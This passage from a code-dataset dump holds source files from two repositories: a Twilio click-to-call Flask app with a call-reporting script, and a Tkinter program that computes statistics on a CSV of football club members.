"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2266,
"license_type": "permissive",
"max_line_length": 388,
"num_lines": 58,
"path": "/README.md",
"repo_name": "CoworkerOrg/clicktocall-flask",
"src_encoding": "UTF-8",
"text": "# Click to Call with Flask\n\nThis is a fork of an application example implementing Click to Call using Twilio. \n\nAt Coworker.org, we used this to support a worker-led call-in campaign. We hosted it on Heroku, so there are a few Heroku-specific files in this repo that don't exist in the original. We also added a small reporting script, `report.py`, that let us easily see how many calls were made. You can see screenshots in [docs/](https://github.com/CoworkerOrg/clicktocall-flask/blob/master/docs).\n\n\n\n## Local development\n\nThis project is built using the [Flask](http://flask.pocoo.org/) web framework. It runs on Python 2.7+ and Python 3.4+.\n\nTo run the app locally, first clone this repository and `cd` into its directory. Then:\n\n1. Create a new virtual environment:\n - If using vanilla [virtualenv](https://virtualenv.pypa.io/en/latest/):\n\n ```\n virtualenv venv\n source venv/bin/activate\n ```\n\n - If using [virtualenvwrapper](https://virtualenvwrapper.readthedocs.org/en/latest/):\n\n ```\n mkvirtualenv clicktocall-flask\n ```\n\n1. Install the requirements:\n\n ```\n pip install -r requirements.txt\n ```\n\n1. Copy the `.env.example` file to `.env`, and edit it including your credentials for the Twilio API (found at https://www.twilio.com/user/account/settings). You will also need a [Twilio Number](https://www.twilio.com/user/account/phone-numbers/incoming).\n1. Run `source .env` to apply the environment variables\n1. Expose your application to the wider internet using ngrok. You can click [here](#expose-the-application-to-the-wider-internet) for more details. This step is important because the application won't work as expected if you run it through localhost.\n\n ```bash\n $ ngrok http 5000\n ```\n\n1. Start the development server:\n\n ```\n make run\n ```\n\nOnce Ngrok is running, open up your browser and go to your Ngrok URL. It will\nlook like this: `http://9a159ccf.ngrok.io`\n\nThat's it!\n\n## Meta\n\n* No warranty expressed or implied. Software is as is. Diggity.\n* [MIT License](http://www.opensource.org/licenses/mit-license.html)\n* Lovingly crafted by Twilio Developer Education.\n"
},
{
"alpha_fraction": 0.7359550595283508,
"alphanum_fraction": 0.7359550595283508,
"avg_line_length": 24.428571701049805,
"blob_id": "0bef35762be9e315bd96cf61ad074cd46c9f77bd",
"content_id": "d18e9d70322c3cf2bc1f03b09903668a4a2630cc",
"detected_licenses": [
"MIT",
"LicenseRef-scancode-warranty-disclaimer"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 178,
"license_type": "permissive",
"max_line_length": 64,
"num_lines": 7,
"path": "/clicktocall/static/js/scripts.js",
"repo_name": "CoworkerOrg/clicktocall-flask",
"src_encoding": "UTF-8",
"text": "function activate() {\n document.getElementById(\"modal\").classList.add(\"is-active\")\n}\n\nfunction deactivate() {\n document.getElementById(\"modal\").classList.remove(\"is-active\")\n}\n"
},
{
"alpha_fraction": 0.4615384638309479,
"alphanum_fraction": 0.6769230961799622,
"avg_line_length": 15.25,
"blob_id": "b55c03b213d56e7201d50ea29e3f70bca0f3d5ea",
"content_id": "225bc3270f042820779762183fc7da1218111679",
"detected_licenses": [
"MIT",
"LicenseRef-scancode-warranty-disclaimer"
],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 65,
"license_type": "permissive",
"max_line_length": 19,
"num_lines": 4,
"path": "/requirements.txt",
"repo_name": "CoworkerOrg/clicktocall-flask",
"src_encoding": "UTF-8",
"text": "Flask==0.12.2\nFlask-SSLify==0.1.5\ntwilio==6.9.0\ngunicorn==19.6.0\n"
},
{
"alpha_fraction": 0.6082417368888855,
"alphanum_fraction": 0.6148351430892944,
"avg_line_length": 29.33333396911621,
"blob_id": "1581b67bccc7f13328e38debeb7c3ccacece5074",
"content_id": "df114c2f51aad2d4fde4c34dc952cb9d3d8bf5f5",
"detected_licenses": [
"MIT",
"LicenseRef-scancode-warranty-disclaimer"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1820,
"license_type": "permissive",
"max_line_length": 72,
"num_lines": 60,
"path": "/clicktocall/app.py",
"repo_name": "CoworkerOrg/clicktocall-flask",
"src_encoding": "UTF-8",
"text": "from flask import Flask\nfrom flask import jsonify\nfrom flask import render_template\nfrom flask import request\nfrom flask import url_for\nfrom flask_sslify import SSLify\n\nfrom twilio.twiml.voice_response import VoiceResponse\nfrom twilio.rest import Client\n\n# Declare and configure application\napp = Flask(__name__, static_url_path='/static')\nsslify = SSLify(app)\napp.config.from_pyfile('local_settings.py')\n\n# Route for Click to Call demo page.\[email protected]('/')\ndef index():\n return render_template('index.html',\n configuration_error=None)\n\[email protected]('/data-use')\ndef data_use():\n return render_template('data-use.html',\n configuration_error=None)\n\n# Voice Request URL\[email protected]('/call', methods=['POST'])\ndef call():\n # Get phone number that was submitted in the form\n phone_number = request.form.get('phoneNumber', None)\n\n try:\n twilio_client = Client(app.config['TWILIO_ACCOUNT_SID'],\n app.config['TWILIO_AUTH_TOKEN'])\n except Exception as e:\n msg = 'Missing configuration variable: {0}'.format(e)\n return jsonify({'error': msg})\n\n try:\n twilio_client.calls.create(from_=app.config['TWILIO_CALLER_ID'],\n to=phone_number,\n url=url_for('.outbound',\n _external=True))\n except Exception as e:\n app.logger.error(e)\n return jsonify({'error': str(e)})\n\n return jsonify({'message': 'Call incoming!'})\n\n\[email protected]('/outbound', methods=['POST'])\ndef outbound():\n script = \"We're connecting you right now.\"\n dial_to = \"+15555555555\"\n\n response = VoiceResponse()\n response.say(script, voice='alice')\n response.dial(dial_to)\n return str(response)\n"
},
{
"alpha_fraction": 0.663551390171051,
"alphanum_fraction": 0.6696261763572693,
"avg_line_length": 34.065574645996094,
"blob_id": "921cf86fbc18060931bb13df86a57b3ec0cc9ee1",
"content_id": "71d8e927e8df3c10389fbec3d4f9cc1ba5c45f44",
"detected_licenses": [
"MIT",
"LicenseRef-scancode-warranty-disclaimer"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2140,
"license_type": "permissive",
"max_line_length": 157,
"num_lines": 61,
"path": "/report.py",
"repo_name": "CoworkerOrg/clicktocall-flask",
"src_encoding": "UTF-8",
"text": "import argparse\nfrom datetime import datetime\nfrom twilio.twiml.voice_response import VoiceResponse\nfrom twilio.rest import Client\n\nfrom app import app\n\nparser = argparse.ArgumentParser(description='Report on Twilio stats for call-in app')\nparser.add_argument('sdate', \n nargs=3,\n type=int,\n help='Campaign start date in the format M D YYYY, where M D and Y are integers')\nparser.add_argument('edate', \n nargs=3,\n type=int,\n help='Campaign end date in the format M D YYYY, where M D and Y are integers')\nparser.add_argument('--duration', \n type=int, \n help='Minimum duration, in seconds. Used to count how many calls were longer than the amount provided. Defaults to 10.')\nparser.add_argument('--delete',\n action='store_true',\n help='Deletes all call records for the time frame provided. ***No further reports can be run on the data set after running the program with this flag.***')\nargs = parser.parse_args()\n\ntry:\n twilio_client = Client(app.config['TWILIO_ACCOUNT_SID'],\n app.config['TWILIO_AUTH_TOKEN'])\nexcept Exception as e:\n msg = 'Missing configuration variable: {0}'.format(e)\n print(jsonify({'error': msg}))\n\nstart = datetime(args.sdate[2], args.sdate[0], args.sdate[1])\nend = datetime(args.edate[2], args.edate[0], args.edate[1])\ncalls_list = twilio_client.calls.list(\n start_time_after=start,\n start_time_before=end,\n status='completed')\n \ndef count_calls(call_length=10):\n total_calls = []\n actual_calls = []\n \n if args.duration:\n call_length = args.duration\n for call in calls_list:\n # print(call.direction)\n if call.direction == 'outbound-dial':\n total_calls.append(call)\n if int(call.duration) > call_length:\n actual_calls.append(int(call.duration))\n print('Total completed calls between', str(start), ' and ', str(end), ': ', len(total_calls))\n print('Calls longer than ', call_length, ' seconds: ', len(actual_calls))\n\ndef delete_calls():\n if args.delete:\n print('Deleting all calls...')\n for call in calls_list:\n call.delete()\n\ncount_calls()\ndelete_calls()\n\n"
}
] | 5 |
GstnC/Challenge-Recursiva
|
https://github.com/GstnC/Challenge-Recursiva
|
13a0b9e80e447a804fa803ce38dab0bdd982f65b
|
a50f4eb9c4359d14f596858b7ce7320676193aa5
|
1745f1e2d379a51815050fc917ba450842368ebe
|
refs/heads/main
| 2023-08-15T17:49:00.858180 | 2021-10-06T14:18:56 | 2021-10-06T14:18:56 | 414,230,474 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5716080665588379,
"alphanum_fraction": 0.572864294052124,
"avg_line_length": 25.10344886779785,
"blob_id": "55b0371d56493f1c4a895d086e8a3b43cde66883",
"content_id": "088e5c63614eda1857ba1659fa2d2ca703578fb1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 796,
"license_type": "no_license",
"max_line_length": 87,
"num_lines": 29,
"path": "/SociosCls.py",
"repo_name": "GstnC/Challenge-Recursiva",
"src_encoding": "UTF-8",
"text": "class SociosCls:\r\n def __init__(self,nombre,edad,equipo,estCivil,estudios):\r\n self.__nombre = nombre\r\n self.__edad = edad\r\n self.__equipo = equipo\r\n self.__estCivil = estCivil\r\n self.__estudios = estudios\r\n pass\r\n\r\n def getNombre(self):\r\n return self.__nombre\r\n \r\n def getEdad(self):\r\n return self.__edad\r\n\r\n def getEquipo(self):\r\n return self.__equipo\r\n\r\n def getEstCivil(self):\r\n return self.__estCivil\r\n \r\n def getEstudios(self):\r\n return self.__estudios\r\n\r\n def esCasadoUniversitario(self):\r\n return self.getEstCivil() == \"Casado\" and self.getEstudios() == \"Universitario\"\r\n\r\n def punto3Model(self):\r\n return (self.getNombre(),self.getEdad(),self.getEquipo())\r\n \r\n "
},
{
"alpha_fraction": 0.8243243098258972,
"alphanum_fraction": 0.8310810923576355,
"avg_line_length": 73,
"blob_id": "2ba6617f0d549deff9f2559c0ecc48ff952756ed",
"content_id": "e3605630b15a22f749362b17b9150f30156f6db9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 298,
"license_type": "no_license",
"max_line_length": 146,
"num_lines": 4,
"path": "/README.md",
"repo_name": "GstnC/Challenge-Recursiva",
"src_encoding": "UTF-8",
"text": "# Challenge-Recursiva\nUn pequeño programa desarrollado en Python 3.9 que desarrolla las tareas especificadas en el Challenge Superliga de Recursiva\n\nSimplemente ejecute main.py desde una terminal o en cualquier editor de código y seleccione el archivo .csv correspondiente a los socios a tratar.\n"
},
{
"alpha_fraction": 0.6197666525840759,
"alphanum_fraction": 0.631091296672821,
"avg_line_length": 30.377777099609375,
"blob_id": "40a53923def6cdf6ca0271b998d01cc20738d2ec",
"content_id": "47360f8297bab00ffcedea173b95e04e4b939333",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2915,
"license_type": "no_license",
"max_line_length": 109,
"num_lines": 90,
"path": "/main.py",
"repo_name": "GstnC/Challenge-Recursiva",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\r\nfrom operator import itemgetter\r\nfrom SociosCls import SociosCls\r\nfrom GUI import GUI\r\n\r\n\r\n\r\ndef main():\r\n global listSocios\r\n global listIndSocios\r\n listSocios = []\r\n listIndSocios = []\r\n \r\n dictCB = {\r\n \"resetSocios\":resetSocios,\r\n \"addSocio\":addSocio,\r\n \"genIndexList\":genIndexList,\r\n \"punto1\":punto1,\r\n \"punto2\":punto2,\r\n \"punto3\":punto3,\r\n \"punto4\":punto4,\r\n \"punto5\":punto5\r\n }\r\n\r\n app = GUI(dictCB)\r\n pass\r\n\r\ndef resetSocios():\r\n global listSocios\r\n listSocios = []\r\n\r\ndef addSocio(nombre,edad,equipo,estCivil,estudios):\r\n listSocios.append(SociosCls(nombre,edad,equipo,estCivil,estudios))\r\n\r\ndef genIndexList():\r\n global listIndSocios\r\n listIndSocios = range(len(listSocios)) \r\n\r\ndef punto1():\r\n return \"La cantidad total de personas registradas es: \" + str(len(listSocios))\r\n\r\ndef punto2():\r\n listRacing = list( filter(lambda ind:(listSocios[ind]).getEquipo()==\"Racing\",listIndSocios) )\r\n cantSocios = len(listRacing)\r\n if cantSocios != 0:\r\n listEdades = list( map(lambda ind:(listSocios[ind]).getEdad(),listRacing) )\r\n prom = (sum(listEdades)*1.0)/cantSocios\r\n return \"El promedio de edad en los hinchas de Racing es de \" + str(round(prom)) + \" años\"\r\n else:\r\n return \"No hay hinchas de Racing registrados.\"\r\n\r\ndef punto3():\r\n listCasados = list ( filter(lambda ind:(listSocios[ind]).esCasadoUniversitario(),listIndSocios) ) [0:100]\r\n if len(listCasados) != 0:\r\n listCasados = sorted(listCasados,key=keyEdad)\r\n return list( map(lambda ind:(listSocios[ind]).punto3Model(),listCasados) )\r\n else:\r\n return [] \r\n \r\ndef keyEdad(ind):\r\n return listSocios[ind].getEdad()\r\n \r\ndef punto4():\r\n listRiver = list ( filter(lambda ind:listSocios[ind].getEquipo()==\"River\",listIndSocios) )\r\n dictNombres = {}\r\n for ind in listRiver:\r\n nombre = listSocios[ind].getNombre()\r\n dictNombres[nombre]= dictNombres.get(nombre,0) + 1\r\n listFreq = sorted(dictNombres.items(),key=itemgetter(1),reverse=True)\r\n return listFreq[0:5]\r\n\r\ndef punto5():\r\n dictEquipos = {}\r\n for Socio in listSocios:\r\n equipo = Socio.getEquipo()\r\n dictEquipos[equipo] = dictEquipos.get(equipo,0)+1\r\n listFreq = sorted(dictEquipos.items(),key=itemgetter(1),reverse=True)\r\n listResponse = []\r\n for i in range(len(listFreq)):\r\n equipo,cantSocios = listFreq[i]\r\n listSociosDelEquipo = list( filter(lambda ind:listSocios[ind].getEquipo()==equipo,listIndSocios) )\r\n listEdades = list( map(lambda ind:listSocios[ind].getEdad(),listSociosDelEquipo) )\r\n edadMax = max(listEdades)\r\n edadMin = min(listEdades)\r\n listResponse.append((equipo,cantSocios,edadMax,edadMin))\r\n return listResponse\r\n\r\nif __name__ == '__main__':\r\n main()\r\n"
},
{
"alpha_fraction": 0.5626714825630188,
"alphanum_fraction": 0.5815252661705017,
"avg_line_length": 40.46398162841797,
"blob_id": "edae9de29928bd88d9b3a9b5ac3340af92ec7fab",
"content_id": "4e4ff670245bd7cf668d127cbf0070eb07e9785d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 20062,
"license_type": "no_license",
"max_line_length": 190,
"num_lines": 472,
"path": "/GUI.py",
"repo_name": "GstnC/Challenge-Recursiva",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\r\nimport io\r\nimport tkinter as tk\r\nfrom tkinter import ttk, filedialog, messagebox\r\n\r\nclass GUI():\r\n def __init__(self, dictCB):\r\n self.callbacks = dictCB\r\n self.root = tk.Tk()\r\n\r\n self.bgLightYellow = \"#E6E8D7\"\r\n self.dataSociosPunto3 = []\r\n self.dataSociosPunto4 = []\r\n self.dataSociosPunto5 = []\r\n\r\n #Configuración Inicial\r\n self.initialConfig()\r\n self.welcomeFrame()\r\n self.loadFrame()\r\n self.punto1Frame()\r\n self.punto2Frame()\r\n self.punto3Frame()\r\n self.punto4Frame()\r\n self.punto5Frame()\r\n \r\n self.root.mainloop()\r\n pass\r\n\r\n def initialConfig(self):\r\n self.root.title(\"Challenge Recursiva - Carrasco Gastón\")\r\n\r\n self.minH = int(self.root.winfo_screenheight() * 0.3)\r\n self.minW = int(self.root.winfo_screenwidth() * 0.3)\r\n \r\n self.minH = max(310,self.minH)\r\n self.minW = max(575,self.minW)\r\n\r\n self.root.resizable(0,0)\r\n self.root.geometry(\"%ix%i+0+0\"%(self.minW,self.minH))\r\n self.root.config(\r\n height=self.minH,width=self.minW\r\n )\r\n self.mainFrame = tk.Frame(self.root)\r\n self.mainFrame.config(\r\n background= self.bgLightYellow\r\n )\r\n self.mainFrame.pack(side='top',fill='both',expand=True)\r\n\r\n self.tkPath = tk.StringVar()\r\n\r\n def welcomeFrame(self):\r\n self.welcomeBaseFrame = tk.Frame(self.mainFrame)\r\n self.welcomeBaseFrame.config(background=self.bgLightYellow)\r\n self.welcomeBaseFrame.pack(side='top',fill='x',ipadx=2)\r\n\r\n self.lblWelcome = tk.Label(self.welcomeBaseFrame)\r\n self.lblWelcome.config(\r\n text=\"Bienvenido! Este programa esta desarrollado para el Challenge - Superliga. \\nSimplemente seleccione el archivo de socios correspondiente y obtenga los resultados pedidos.\",\r\n background=self.bgLightYellow,\r\n anchor='w'\r\n )\r\n self.lblWelcome.pack(side='top',ipadx=2,pady=(5,1))\r\n\r\n def loadFrame(self):\r\n self.loadBaseFrame = tk.Frame(self.mainFrame)\r\n self.loadBaseFrame.config(background=self.bgLightYellow)\r\n self.loadBaseFrame.pack(side='top',fill='x',ipady=10,ipadx=2)\r\n\r\n self.loadLabel = tk.Label(self.loadBaseFrame)\r\n self.loadLabel.config(\r\n text=\"Seleccione el archivo:\",\r\n anchor=\"e\", background=self.bgLightYellow\r\n )\r\n self.loadLabel.pack(side='left',padx=(8,3))\r\n\r\n self.loadButton = tk.Button(self.loadBaseFrame)\r\n self.loadButton.config(\r\n text=\"Buscar\", command=self.selectFile\r\n )\r\n self.loadButton.pack(side='right',padx=(5,8),ipadx=1,ipady=1)\r\n \r\n self.loadEntryFile = tk.Entry(self.loadBaseFrame)\r\n self.loadEntryFile.config(\r\n textvariable=self.tkPath,\r\n state='disabled',\r\n background='white'\r\n )\r\n self.loadEntryFile.pack(side='left',fill='x',expand=True)\r\n\r\n\r\n def punto1Frame(self):\r\n self.punto1FrameBase = tk.Frame(self.mainFrame)\r\n self.punto1FrameBase.config(background=self.bgLightYellow)\r\n self.punto1FrameBase.pack(side='top',fill='x',ipady=10,ipadx=2)\r\n\r\n self.punto1Title = tk.Label(self.punto1FrameBase)\r\n self.punto1Title.config(\r\n text=\"Punto 1: \",\r\n anchor=\"e\", background=self.bgLightYellow\r\n )\r\n self.punto1Title.pack(side='left',padx=(8,3))\r\n\r\n self.lblResponsePunto1 = tk.Label(self.punto1FrameBase)\r\n self.lblResponsePunto1.config(\r\n text=\"Sin respuesta. 
No se ha cargado ningún archivo aún.\",\r\n anchor='e',background=self.bgLightYellow\r\n )\r\n self.lblResponsePunto1.pack(side='left',padx=(4,3),fill='x')\r\n\r\n def punto2Frame(self):\r\n self.punto2FrameBase = tk.Frame(self.mainFrame)\r\n self.punto2FrameBase.config(background=self.bgLightYellow)\r\n self.punto2FrameBase.pack(side='top',fill='x',ipady=10,ipadx=2)\r\n\r\n self.punto2Title = tk.Label(self.punto2FrameBase)\r\n self.punto2Title.config(\r\n text=\"Punto 2: \",\r\n anchor=\"e\", background=self.bgLightYellow\r\n )\r\n self.punto2Title.pack(side='left',padx=(8,3))\r\n\r\n self.lblResponsePunto2 = tk.Label(self.punto2FrameBase)\r\n self.lblResponsePunto2.config(\r\n text=\"Sin respuesta. No se ha cargado ningún archivo aún.\",\r\n anchor='e',background=self.bgLightYellow\r\n )\r\n self.lblResponsePunto2.pack(side='left',padx=(4,3),fill='x')\r\n\r\n def punto3Frame(self):\r\n self.punto3FrameBase = tk.Frame(self.mainFrame)\r\n self.punto3FrameBase.config(background=self.bgLightYellow)\r\n self.punto3FrameBase.pack(side='top',fill='x',ipady=10,ipadx=2)\r\n\r\n self.punto3Title = tk.Label(self.punto3FrameBase)\r\n self.punto3Title.config(\r\n text=\"Punto 3: \",\r\n anchor=\"e\", background=self.bgLightYellow\r\n )\r\n self.punto3Title.pack(side='left',padx=(8,3))\r\n\r\n self.lblResponsePunto3 = tk.Label(self.punto3FrameBase)\r\n self.lblResponsePunto3.config(\r\n text=\"Sin respuesta. No se ha cargado ningún archivo aún.\",\r\n anchor='e',background=self.bgLightYellow\r\n )\r\n self.lblResponsePunto3.pack(side='left',padx=(4,3),fill='x')\r\n\r\n def punto4Frame(self):\r\n self.punto4FrameBase = tk.Frame(self.mainFrame)\r\n self.punto4FrameBase.config(background=self.bgLightYellow)\r\n self.punto4FrameBase.pack(side='top',fill='x',ipady=10,ipadx=2)\r\n\r\n self.punto4Title = tk.Label(self.punto4FrameBase)\r\n self.punto4Title.config(\r\n text=\"Punto 4: \",\r\n anchor=\"e\", background=self.bgLightYellow\r\n )\r\n self.punto4Title.pack(side='left',padx=(8,3))\r\n\r\n self.lblResponsePunto4 = tk.Label(self.punto4FrameBase)\r\n self.lblResponsePunto4.config(\r\n text=\"Sin respuesta. No se ha cargado ningún archivo aún.\",\r\n anchor='e',background=self.bgLightYellow\r\n )\r\n self.lblResponsePunto4.pack(side='left',padx=(4,3),fill='x')\r\n\r\n def punto5Frame(self):\r\n self.punto5FrameBase = tk.Frame(self.mainFrame)\r\n self.punto5FrameBase.config(background=self.bgLightYellow)\r\n self.punto5FrameBase.pack(side='top',fill='x',ipady=10,ipadx=2)\r\n\r\n self.punto5Title = tk.Label(self.punto5FrameBase)\r\n self.punto5Title.config(\r\n text=\"Punto 5: \",\r\n anchor=\"e\", background=self.bgLightYellow\r\n )\r\n self.punto5Title.pack(side='left',padx=(8,3))\r\n\r\n self.lblResponsePunto5 = tk.Label(self.punto5FrameBase)\r\n self.lblResponsePunto5.config(\r\n text=\"Sin respuesta. 
No se ha cargado ningún archivo aún.\",\r\n anchor='e',background=self.bgLightYellow\r\n )\r\n self.lblResponsePunto5.pack(side='left',padx=(4,3),fill='x')\r\n\r\n def selectFile(self):\r\n path = filedialog.askopenfilename(\r\n title=\"Seleccionar archivo de socios\",\r\n filetypes=((\"csv\",\"*.csv\"),(\"Todos los archivos\",\"*.*\"))\r\n )\r\n if path != \"\":\r\n print(\"Path: \" + path)\r\n if not path.endswith(\".csv\"):\r\n ext = path.split('.')[-1]\r\n messagebox.showerror(\r\n message=\"Error, la extensión del archivo no puede ser %s\"%(ext),\r\n title=\"Error de lectura\"\r\n )\r\n else:\r\n self.callbacks[\"resetSocios\"]()\r\n fileSocio = io.open(path,'r',encoding='cp1252')\r\n readingError = False\r\n \r\n line = fileSocio.readline()\r\n line = line.replace('\\r','').replace('\\n','')\r\n if line == \"\":\r\n readingError = True\r\n messagebox.showerror(\r\n message=\"Error, el archivo esta vacio.\",\r\n title=\"Error de lectura\"\r\n )\r\n\r\n try:\r\n while (line!=\"\"):\r\n nombre,edad,equipo,estCivil,estudios = line.split(';')\r\n\r\n #generar nuevo Socio\r\n self.callbacks[\"addSocio\"](nombre,int(edad),equipo,estCivil,estudios)\r\n \r\n line = fileSocio.readline()\r\n line = line.replace('\\r','').replace('\\n','')\r\n except Exception as e:\r\n print(e)\r\n messagebox.showerror(\r\n message=\"Error, el formato del archivo no es el esperado.\",\r\n title=\"Error de lectura\"\r\n )\r\n readingError = True\r\n if not readingError:\r\n self.tkPath.set(path)\r\n self.callbacks[\"genIndexList\"]()\r\n self.executePunto1()\r\n self.executePunto2()\r\n self.executePunto3()\r\n self.executePunto4()\r\n self.executePunto5()\r\n else:\r\n pass\r\n\r\n #Ejecucion Pto1\r\n def executePunto1(self):\r\n response = self.callbacks[\"punto1\"]()\r\n self.lblResponsePunto1.config(text=response)\r\n self.lblResponsePunto1.update()\r\n #Ejecucion Pto2\r\n def executePunto2(self):\r\n response = self.callbacks[\"punto2\"]()\r\n self.lblResponsePunto2.config(text=response)\r\n self.lblResponsePunto2.update()\r\n #Ejecucion Pto3\r\n def executePunto3(self):\r\n response = self.callbacks[\"punto3\"]()\r\n self.dataSociosPunto3 = response\r\n if response == []:\r\n self.punto3EmptyResponse()\r\n else:\r\n self.punto3LoadResponse()\r\n \r\n def punto3EmptyResponse(self):\r\n if hasattr(self,\"btnResponsePunto3\"):\r\n self.btnResponsePunto3.pack_forget()\r\n self.btnResponsePunto3.destroy()\r\n del self.btnResponsePunto3\r\n if not hasattr(self,\"lblResponsePunto3\"):\r\n self.lblResponsePunto3 = tk.Label(self.punto3FrameBase)\r\n self.lblResponsePunto3.config(\r\n text=\"No hay socios registrados que cumplan los requisitos.\",\r\n anchor='e',background=self.bgLightYellow\r\n )\r\n self.lblResponsePunto3.pack(side='left',padx=(4,3),fill='x')\r\n else:\r\n self.lblResponsePunto3.config(text=\"No hay socios registrados que cumplan los requisitos.\")\r\n self.lblResponsePunto3.update()\r\n\r\n def punto3LoadResponse(self):\r\n if hasattr(self,\"lblResponsePunto3\"):\r\n self.lblResponsePunto3.pack_forget()\r\n self.lblResponsePunto3.destroy()\r\n del self.lblResponsePunto3\r\n if not hasattr(self,\"btnResponsePunto3\"):\r\n self.btnResponsePunto3 = tk.Button(self.punto3FrameBase)\r\n self.btnResponsePunto3.config(\r\n text=\"Ver respuesta\", command=self.showResponsePunto3\r\n )\r\n self.btnResponsePunto3.pack(side='left',padx=(4,3))\r\n \r\n def showResponsePunto3(self):\r\n if hasattr(self,\"topFramePto3\"):\r\n self.topFramePto3.focus()\r\n else:\r\n xInit = int(self.root.winfo_rootx()) + 
int(self.root.winfo_width()*0.25)\r\n yInit = int(self.root.winfo_rooty()) + int(self.root.winfo_height()*0.25)\r\n\r\n self.topFramePto3 = tk.Toplevel(self.root)\r\n self.topFramePto3.title(\"Socios casados, universitarios y ordenados por edad.\")\r\n self.topFramePto3.geometry(\"450x270+%i+%i\"%(xInit,yInit))\r\n btnFrame = ttk.Frame(self.topFramePto3)\r\n btnFrame.pack(side='bottom',fill='x')\r\n btnOK = ttk.Button(btnFrame)\r\n btnOK.config(text=\"Aceptar\",command=self.destroyTopPto3)\r\n btnOK.pack(side='right',padx=(0,10), pady=(0,3))\r\n\r\n tableFrame = ttk.Frame(self.topFramePto3)\r\n tableFrame.pack(side='top',fill='both',expand='True')\r\n \r\n dataColumns = [\"#\",\"Nombre\",\"Edad\",\"Equipo\"]\r\n tableResponse = ttk.Treeview(tableFrame,columns=dataColumns,show='headings')\r\n \r\n for c in dataColumns:\r\n tableResponse.heading(c,text=c,anchor='w')\r\n tableResponse.column(c,width=len(c),stretch=True,anchor='w')\r\n for i in range(len(self.dataSociosPunto3)):\r\n nombre,edad,equipo = self.dataSociosPunto3[i]\r\n tableResponse.insert('','end',values=(i+1,nombre,edad,equipo))\r\n \r\n scroll = ttk.Scrollbar(tableFrame,orient='vertical',command=tableResponse.yview)\r\n tableResponse.config(yscrollcommand=scroll.set)\r\n tableResponse.pack(side='left',fill='both',expand=True,padx=(15,0),pady=5)\r\n scroll.pack(side='left',fill='y',padx=(0,10),pady=5)\r\n\r\n def destroyTopPto3(self):\r\n self.topFramePto3.destroy()\r\n del self.topFramePto3\r\n #Ejecucion Pto4\r\n def executePunto4(self):\r\n response = self.callbacks[\"punto4\"]()\r\n self.dataSociosPunto4 = response\r\n if response == []:\r\n self.punto4EmptyResponse()\r\n else:\r\n self.punto4LoadResponse()\r\n \r\n def punto4EmptyResponse(self):\r\n if hasattr(self,\"btnResponsePunto4\"):\r\n self.btnResponsePunto4.pack_forget()\r\n self.btnResponsePunto4.destroy()\r\n del self.btnResponsePunto4\r\n if not hasattr(self,\"lblResponsePunto4\"):\r\n self.lblResponsePunto4 = tk.Label(self.punto4FrameBase)\r\n self.lblResponsePunto4.config(\r\n text=\"No hay socios registrados hinchas de River.\",\r\n anchor='e',background=self.bgLightYellow\r\n )\r\n self.lblResponsePunto4.pack(side='left',padx=(4,3),fill='x')\r\n else:\r\n self.lblResponsePunto4.config(text=\"No hay socios registrados hinchas de River.\")\r\n self.lblResponsePunto4.update()\r\n\r\n def punto4LoadResponse(self):\r\n if hasattr(self,\"lblResponsePunto4\"):\r\n self.lblResponsePunto4.pack_forget()\r\n self.lblResponsePunto4.destroy()\r\n del self.lblResponsePunto4\r\n if not hasattr(self,\"btnResponsePunto4\"):\r\n self.btnResponsePunto4 = tk.Button(self.punto4FrameBase)\r\n self.btnResponsePunto4.config(\r\n text=\"Ver respuesta\", command=self.showResponsePunto4\r\n )\r\n self.btnResponsePunto4.pack(side='left',padx=(4,3))\r\n \r\n def showResponsePunto4(self):\r\n if hasattr(self,\"topFramePto4\"):\r\n self.topFramePto4.focus()\r\n else:\r\n xInit = int(self.root.winfo_rootx()) + int(self.root.winfo_width()*0.25)\r\n yInit = int(self.root.winfo_rooty()) + int(self.root.winfo_height()*0.25)\r\n\r\n self.topFramePto4 = tk.Toplevel(self.root)\r\n self.topFramePto4.title(\"Ranking Top-5 Nombres de socios de River.\")\r\n self.topFramePto4.geometry(\"400x220+%i+%i\"%(xInit,yInit))\r\n btnFrame = ttk.Frame(self.topFramePto4)\r\n btnFrame.pack(side='bottom',fill='x')\r\n btnOK = ttk.Button(btnFrame)\r\n btnOK.config(text=\"Aceptar\",command=self.destroyTopPto4)\r\n btnOK.pack(side='right',padx=(0,10), pady=(0,3))\r\n\r\n tableFrame = ttk.Frame(self.topFramePto4)\r\n 
tableFrame.pack(side='top',fill='both',expand='True')\r\n \r\n dataColumns = [\"#\",\"Nombre\",\"Socios\"]\r\n tableResponse = ttk.Treeview(tableFrame,columns=dataColumns,show='headings')\r\n \r\n for c in dataColumns:\r\n tableResponse.heading(c,text=c,anchor='w')\r\n tableResponse.column(c,width=len(c),stretch=True,anchor='w')\r\n for i in range(len(self.dataSociosPunto4)):\r\n nombre,cantSocios = self.dataSociosPunto4[i]\r\n tableResponse.insert('','end',values=(i+1,nombre,cantSocios))\r\n \r\n scroll = ttk.Scrollbar(tableFrame,orient='vertical',command=tableResponse.yview)\r\n tableResponse.config(yscrollcommand=scroll.set)\r\n tableResponse.pack(side='left',fill='both',expand=True,padx=(15,0),pady=5)\r\n scroll.pack(side='left',fill='y',padx=(0,10),pady=5)\r\n \r\n def destroyTopPto4(self):\r\n self.topFramePto4.destroy()\r\n del self.topFramePto4\r\n #Ejecucion Pto5\r\n def executePunto5(self):\r\n response = self.callbacks[\"punto5\"]()\r\n self.dataSociosPunto5 = response\r\n if response == []:\r\n self.punto5EmptyResponse()\r\n else:\r\n self.punto5LoadResponse()\r\n \r\n def punto5EmptyResponse(self):\r\n if hasattr(self,\"btnResponsePunto5\"):\r\n self.btnResponsePunto5.pack_forget()\r\n 